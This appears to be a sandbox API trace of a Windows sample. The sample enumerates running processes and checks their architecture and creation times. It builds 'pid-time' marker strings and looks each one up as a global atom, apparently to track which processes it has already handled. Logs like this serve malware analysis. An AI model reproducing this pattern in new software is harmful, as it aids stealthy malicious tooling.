	[0075.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e8b0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0075.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0075.569] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.569] CloseHandle (hObject=0x224) returned 1
	[0075.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72ea18, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0075.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.569] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.569] CloseHandle (hObject=0x224) returned 1
	[0075.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772218, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.569] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.570] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.571] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0075.571] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.571] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.572] GetLastError () returned 0x5
	[0075.573] GetLastError () returned 0x5
	[0075.573] GetLastError () returned 0x5
	[0075.573] GetLastError () returned 0x5
	[0075.573] GetLastError () returned 0x5
	[0075.573] GetLastError () returned 0x5
	[0075.573] GetLastError () returned 0x5
	[0075.573] GetLastError () returned 0x5
	[0075.573] GetLastError () returned 0x5
	[0075.573] GetLastError () returned 0x5
	[0075.573] GetLastError () returned 0x5
	[0075.573] GetLastError () returned 0x5
	[0075.573] GetLastError () returned 0x5
	[0075.573] GetLastError () returned 0x5
	[0075.573] GetLastError () returned 0x5
	[0075.573] GetLastError () returned 0x5
	[0075.573] GetLastError () returned 0x5
	[0075.573] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.573] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0075.573] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0075.573] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0075.573] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0075.573] CloseHandle (hObject=0x224) returned 1
	[0075.573] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0075.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x772218, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0075.574] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.574] CloseHandle (hObject=0x224) returned 1
	[0075.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72ea18, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0075.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0075.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0075.574] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.574] CloseHandle (hObject=0x224) returned 1
	[0075.574] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772170, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0075.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16c28) returned 0xc0000004
	[0075.616] VirtualAlloc (lpAddress=0x0, dwSize=0x16d28, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0075.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16d28, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0075.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0075.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772158, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0075.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0075.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772158, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0075.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x7721d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0075.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0075.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x772188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0075.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x772200, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0075.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x772170, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0075.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0075.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.619] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0075.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0075.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x72dd70, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0075.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0075.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0075.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0075.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0075.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0075.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.620] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0075.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0075.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0075.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0075.621] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.621] CloseHandle (hObject=0x224) returned 1
	[0075.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x772188, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0075.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0075.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.621] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0075.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x7288b8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0075.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0075.622] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.622] CloseHandle (hObject=0x224) returned 1
	[0075.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x7287f8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0075.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0075.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0075.622] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.622] CloseHandle (hObject=0x224) returned 1
	[0075.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772158, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0075.622] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.622] CloseHandle (hObject=0x224) returned 1
	[0075.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.622] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0075.622] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.622] CloseHandle (hObject=0x224) returned 1
	[0075.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772188, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0075.623] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.623] CloseHandle (hObject=0x224) returned 1
	[0075.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x7287f8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0075.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0075.623] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.623] CloseHandle (hObject=0x224) returned 1
	[0075.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0075.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0075.623] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.623] CloseHandle (hObject=0x224) returned 1
	[0075.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x772170, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0075.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772158, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.623] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0075.623] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.623] CloseHandle (hObject=0x224) returned 1
	[0075.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0075.624] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.624] CloseHandle (hObject=0x224) returned 1
	[0075.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0075.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0075.624] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.624] CloseHandle (hObject=0x224) returned 1
	[0075.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x7289f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0075.624] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0075.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0075.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0075.626] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.626] CloseHandle (hObject=0x224) returned 1
	[0075.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x7288b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0075.626] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0075.626] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0075.626] CloseHandle (hObject=0x224) returned 1
